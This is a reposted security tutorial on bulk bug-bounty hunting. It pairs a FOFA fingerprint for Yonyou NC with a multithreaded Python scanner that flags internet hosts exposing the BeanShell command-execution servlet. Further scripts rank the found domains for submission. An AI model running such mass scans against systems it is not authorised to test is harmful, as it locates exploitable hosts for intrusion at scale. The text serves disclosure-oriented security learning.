A Brief Look at Approaches to Batch SRC Vulnerability Hunting

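Disclaimer: Most articles on this public account come from the author's everyday study notes; some are reposted with the author's authorization or through whitelisting by other public accounts. Reposting without authorization is strictly prohibited; to repost, contact us to be whitelisted. Do not use the techniques described in the articles for illegal testing; any adverse consequences arising from doing so ...

2023-2-9 08:31:19 Author: 潇湘信安 Views: 31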

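0x01 Preface

Before I got into SRC work, I shared a question with many others: how do the experts hunt for vulnerabilities in bulk? After two months of learning the hard way, I have gradually built up some understanding and experience of my own, so I am sharing it here to exchange ideas with everyone. Corrections are welcome.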

0x02 Vulnerability Example



The page at http://xxx.xxxx.xxxx.xxxx/servlet//~ic/bsh.servlet.BshServlet exposes a text box in which commands can be executed.

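0x03 Batch Detection of the Vulnerability

Once we know the details of this vulnerability, we use its fingerprint to search FOFA for sites across the country that run the affected system. For example, the FOFA search fingerprint for Yonyou NC (用友nc) is:

app="用友-UFIDA-NC"

A FOFA client such as https://github.com/wgpsec/fofa_viewer can run this query; then export all of the matching sites to a txt file.

Based on the fingerprint of the Yonyou NC command execution vulnerability, we write a simple multithreaded detection script: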
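The detection script in this section appends a fixed path to every exported line, so each entry should be a bare `scheme://host[:port]` with no trailing slash or path. The following is a minimal sketch of that cleanup step, not part of the original article; the function name `normalize_targets` and the rule that entries without a scheme default to `http://` are assumptions made for illustration.

```python
from urllib.parse import urlsplit


def normalize_targets(lines):
    """Return de-duplicated base URLs (scheme://host[:port]) in first-seen order."""
    seen = set()
    targets = []
    for raw in lines:
        entry = raw.strip()
        if not entry:
            continue  # skip blank lines in the export
        # Assumption: an entry without a scheme is treated as plain HTTP.
        if "://" not in entry:
            entry = "http://" + entry
        parts = urlsplit(entry)
        if not parts.netloc:
            continue  # not a usable URL
        # Drop any path or query so a fixed path can be appended later.
        base = f"{parts.scheme.lower()}://{parts.netloc.lower()}"
        if base not in seen:
            seen.add(base)
            targets.append(base)
    return targets
```

The cleaned list can then be written back out, one entry per line, as the input file for the detection script.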

    # -*- coding: UTF-8 -*-
    # Author: dota_st
    # Date: 2021/5/10 9:16
    # blog: www.wlhhlc.top
    import os

    import requests
    import threadpool


    def exp(url):
        # Request the BeanShell servlet page and look for its marker string.
        poc = r"""/servlet//~ic/bsh.servlet.BshServlet"""
        url = url + poc
        try:
            res = requests.get(url, timeout=3)
            if "BeanShell" in res.text:
                print("[*] Vulnerable URL: " + url)
                with open("用友命令执行列表.txt", 'a') as f:
                    f.write(url + "\n")
        except requests.RequestException:
            # Unreachable or timed-out hosts are skipped.
            pass


    def multithreading(funcname, params=None, filename="yongyou.txt", pools=10):
        # Run funcname once per line of filename on a pool of worker threads.
        params = params or []
        works = []
        with open(filename, "r") as f:
            for i in f:
                func_params = [i.rstrip("\n")] + params
                works.append((func_params, None))
        pool = threadpool.ThreadPool(pools)
        reqs = threadpool.makeRequests(funcname, works)
        for req in reqs:
            pool.putRequest(req)
        pool.wait()


    def main():
        # Empty the result file left over from a previous run.
        if os.path.exists("用友命令执行列表.txt"):
            with open("用友命令执行列表.txt", 'w'):
                pass
        multithreading(exp, [], "yongyou.txt", 10)


    if __name__ == '__main__':
        main()
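The script relies on the third-party `threadpool` package to fan work out across threads. As a hedged alternative, the same pattern can be sketched with the standard library's `concurrent.futures`; the helper name `run_concurrently` is hypothetical and is not something the original author used.

```python
from concurrent.futures import ThreadPoolExecutor


def run_concurrently(func, items, workers=10):
    """Apply func to every item on a thread pool; return results in input order."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        # pool.map preserves input order; an exception raised inside func
        # is re-raised here when its result is collected.
        return list(pool.map(func, items))
```

With this helper, a call such as `run_concurrently(exp, targets, workers=10)` would play the role of `multithreading(exp, [], "yongyou.txt", 10)`, assuming `targets` is a list of URLs already read from the file.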

0x04 Batch Detection of Domains and Weight

    # -*- coding: UTF-8 -*-
    # Author: dota_st
    # Date: 2021/6/2 22:39
    # blog: www.wlhhlc.top
    import os
    import re
    import time
    from urllib.parse import urlparse

    import requests
    from fake_useragent import UserAgent
    from tqdm import tqdm


    # ip138 reverse lookup
    def ip138_chaxun(ip, ua):
        ip138_headers = {
            'Host': 'site.ip138.com',
            'User-Agent': ua.random,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate, br',
            'Referer': 'https://site.ip138.com/'}
        ip138_url = 'https://site.ip138.com/' + str(ip) + '/'
        try:
            ip138_res = requests.get(url=ip138_url, headers=ip138_headers, timeout=2).text
            # '暂无结果' is the "no results" marker on the ip138 page.
            if '<li>暂无结果</li>' not in ip138_res:
                result_site = re.findall(r"""</span><a href="/(.*?)/" target="_blank">""", ip138_res)
                return result_site
        except Exception:
            pass


    # aizhan reverse lookup
    def aizhan_chaxun(ip, ua):
        aizhan_headers = {
            'Host': 'dns.aizhan.com',
            'User-Agent': ua.random,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Accept-Encoding': 'gzip, deflate, br',
            'Referer': 'https://dns.aizhan.com/'}
        aizhan_url = 'https://dns.aizhan.com/' + str(ip) + '/'
        try:
            aizhan_r = requests.get(url=aizhan_url, headers=aizhan_headers, timeout=2).text
            aizhan_nums = re.findall(r'''<span class="red">(.*?)</span>''', aizhan_r)
            if int(aizhan_nums[0]) > 0:
                aizhan_domains = re.findall(r'''rel="nofollow" target="_blank">(.*?)</a>''', aizhan_r)
                return aizhan_domains
        except Exception:
            pass


    def catch_result(i):
        ua_header = UserAgent()
        i = i.strip()
        try:
            # The original split the URL on ':' and '//' by hand, which only
            # works when the URL carries an explicit port; urlparse handles both.
            ip = urlparse(i).hostname
            ip138_result = ip138_chaxun(ip, ua_header)
            aizhan_result = aizhan_chaxun(ip, ua_header)
            time.sleep(1)
            if (ip138_result is not None and ip138_result != []) or aizhan_result is not None:
                with open("ip反查结果.txt", 'a') as f:
                    result = "[url]:" + i + " " + "[ip138]:" + str(ip138_result) + " [aizhan]:" + str(aizhan_result)
                    print(result)
                    f.write(result + "\n")
            else:
                with open("反查失败列表.txt", 'a') as f:
                    f.write(i + "\n")
        except Exception:
            pass


    if __name__ == '__main__':
        with open("用友命令执行列表.txt", 'r') as f:
            url_list = f.readlines()
        # Clear both output txt files on every start.
        for name in ("反查失败列表.txt", "ip反查结果.txt"):
            if os.path.exists(name):
                with open(name, 'w'):
                    pass
        for i in tqdm(url_list):
            catch_result(i)

    # -*- coding: UTF-8 -*-
    # Author: dota_st
    # Date: 2021/6/2 23:39
    # blog: www.wlhhlc.top
    import os
    import re
    import ssl
    import time
    import urllib.request
    from urllib.error import HTTPError

    import requests
    import threadpool
    import tldextract
    from fake_useragent import UserAgent

    ssl._create_default_https_context = ssl._create_stdlib_context
    bd_mb = []  # results with a non-zero Baidu PC or mobile weight
    gg = []     # results with zero Baidu weight, checked against Google PR later
    flag = 0    # 0 = first pass, 1 = retry pass over fail.txt


    # Data cleaning: reduce each reverse-lookup line to "[url]:... [domain]:..."
    def get_data():
        with open("ip反查结果.txt") as src:
            url_list = src.readlines()
        with open("domain.txt", 'w') as f:
            for i in url_list:
                i = i.strip()
                res = i.split('[ip138]:')[1].split('[aizhan]')[0].split(",")[0].strip()
                if res == 'None' or res == '[]':
                    res = i.split('[aizhan]:')[1].split(",")[0].strip()
                if res != '[]':
                    res = re.sub(r"['\[\]]", '', res)
                    ext = tldextract.extract(res)
                    res1 = i.split('[url]:')[1].split('[ip138]')[0].strip()
                    # Named fields are used instead of the original ext[1:] slice,
                    # which depends on the tuple layout of the result object.
                    res2 = "http://www." + ext.domain + '.' + ext.suffix
                    result = '[url]:' + res1 + '\t' + '[domain]:' + res2
                    f.write(result + "\n")


    def getPc(domain):
        ua_header = UserAgent()
        headers = {
            'Host': 'baidurank.aizhan.com',
            'User-Agent': ua_header.random,
            'Sec-Fetch-Dest': 'document',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'Cookie': ''}
        aizhan_pc = 'https://baidurank.aizhan.com/api/br?domain={}&style=text'.format(domain)
        try:
            req = urllib.request.Request(aizhan_pc, headers=headers)
            response = urllib.request.urlopen(req, timeout=10)
            a = response.read().decode("utf8")
            result_pc = re.findall(r'>(.*?)</a>', a)
            pc = result_pc[0]
        except HTTPError:
            # Note: retries indefinitely while the server keeps returning HTTP errors.
            time.sleep(3)
            return getPc(domain)
        return pc


    def getMobile(domain):
        ua_header = UserAgent()
        headers = {
            'Host': 'baidurank.aizhan.com',
            'User-Agent': ua_header.random,
            'Sec-Fetch-Dest': 'document',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'Cookie': ''}
        aizhan_mobile = 'https://baidurank.aizhan.com/api/mbr?domain={}&style=text'.format(domain)
        try:
            req = urllib.request.Request(aizhan_mobile, headers=headers)
            response = urllib.request.urlopen(req, timeout=10)
            a = response.read().decode("utf8")
            result_m = re.findall(r'>(.*?)</a>', a)
            mobile = result_m[0]
        except HTTPError:
            time.sleep(3)
            return getMobile(domain)
        return mobile


    # Weight lookup
    def seo(domain, url):
        try:
            result_pc = getPc(domain)
            result_mobile = getMobile(domain)
        except Exception:
            if flag == 0:
                print('[!] Check failed for target {}; written to fail.txt for a retry'.format(url))
                print(domain)
                with open('fail.txt', 'a', encoding='utf-8') as o:
                    o.write(url + '\n')
            else:
                print('[!!] Second check failed for target {}'.format(url))
            # The original fell through here and hit undefined variables.
            return False
        result = '[+] Baidu weight: ' + result_pc + ' Mobile weight: ' + result_mobile + ' ' + url
        print(result)
        if result_pc == '0' and result_mobile == '0':
            gg.append(result)
        else:
            bd_mb.append(result)
        return True


    def exp(url):
        try:
            main_domain = url.split('[domain]:')[1]
            ext = tldextract.extract(main_domain)
            domain = ext.domain + '.' + ext.suffix
            seo(domain, url)
        except Exception:
            pass


    def multithreading(funcname, params=None, filename="domain.txt", pools=15):
        params = params or []
        works = []
        with open(filename, "r") as f:
            for i in f:
                func_params = [i.rstrip("\n")] + params
                works.append((func_params, None))
        pool = threadpool.ThreadPool(pools)
        reqs = threadpool.makeRequests(funcname, works)
        for req in reqs:
            pool.putRequest(req)
        pool.wait()


    def google_simple(url, j):
        google_pc = "https://pr.aizhan.com/{}/".format(url)
        bz = 0
        http_or_find = 0
        try:
            response = requests.get(google_pc, timeout=10).text
            http_or_find = 1
            # '谷歌PR' is the "Google PR" label in the aizhan page markup.
            result_pc = re.findall(r'<span>谷歌PR:</span><a>(.*?)/></a>', response)[0]
            result_num = result_pc.split('alt="')[1].split('"')[0].strip()
            if int(result_num) > 0:
                bz = 1
            result = '[+] Google PR: ' + result_num + ' ' + j
            return result, bz
        except Exception:
            if http_or_find != 0:
                # The page loaded but could not be parsed (the original
                # concatenated the literal "j" instead of the variable).
                result = "[!] Format error: " + j
                return result, bz
            else:
                time.sleep(3)
                return google_simple(url, j)


    def exec_function():
        global flag
        # Create or empty fail.txt before the first pass.
        with open("fail.txt", 'w', encoding='utf-8'):
            pass
        multithreading(exp, [], "domain.txt", 15)
        with open("fail.txt", 'r', encoding='utf-8') as failed:
            fail_url_list = failed.readlines()
        if len(fail_url_list) > 0:
            print("*" * 12 + "Rechecking the failed URLs" + "*" * 12)
            flag = 1
            multithreading(exp, [], "fail.txt", 15)
        with open("权重列表.txt", 'w', encoding="utf-8") as f:
            for i in bd_mb:
                f.write(i + "\n")
            f.write("\n")
            f.write("-" * 25 + "Starting Google PR check" + "-" * 25 + "\n")
            f.write("\n")
            print("*" * 12 + "Starting Google PR check" + "*" * 12)
            for j in gg:
                main_domain = j.split('[domain]:')[1]
                ext = tldextract.extract(main_domain)
                domain = "www." + ext.domain + '.' + ext.suffix
                google_result, bz = google_simple(domain, j)
                time.sleep(1)
                print(google_result)
                if bz == 1:
                    f.write(google_result + "\n")
        print("Check complete; the txt file has been saved in the current directory")


    def main():
        get_data()
        exec_function()


    if __name__ == "__main__":
        main()
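The weight lookups in this script retry by calling themselves again after an HTTP error, with no upper limit on attempts. A bounded retry is one possible alternative; the sketch below is an illustration under assumptions, not the author's code, and the helper name `retry` and its parameters are hypothetical.

```python
import time


def retry(func, attempts=3, delay=3.0, exceptions=(Exception,), sleep=time.sleep):
    """Call func() up to `attempts` times, sleeping `delay` seconds between tries."""
    if attempts < 1:
        raise ValueError("attempts must be at least 1")
    last_error = None
    for attempt in range(1, attempts + 1):
        try:
            return func()
        except exceptions as err:
            last_error = err
            # Wait before the next try, but not after the final failure.
            if attempt < attempts:
                sleep(delay)
    # Every attempt failed: surface the last error to the caller.
    raise last_error
```

A lookup could then be wrapped as `retry(lambda: fetch(domain), attempts=3, exceptions=(HTTPError,))`, where `fetch` stands for a single-request version of the lookup with the recursive call removed.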

0x05 Vulnerability Submission

The last step is to submit the vulnerabilities one by one.

0x06 Closing

Source: dota_st's blog. Original article: https://www.wlhhlc.top/posts/997/

Article source: http://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247501002&idx=1&sn=d0098c4eaf51c149cf775c79674c64d6&chksm=cfa560d9f8d2e9cf44ade3c668fdd938d405f3cd63ac7c9fca6453920b8403ceed20f6a7c7b2#rd

For copyright concerns, contact: admin#unsafe.sh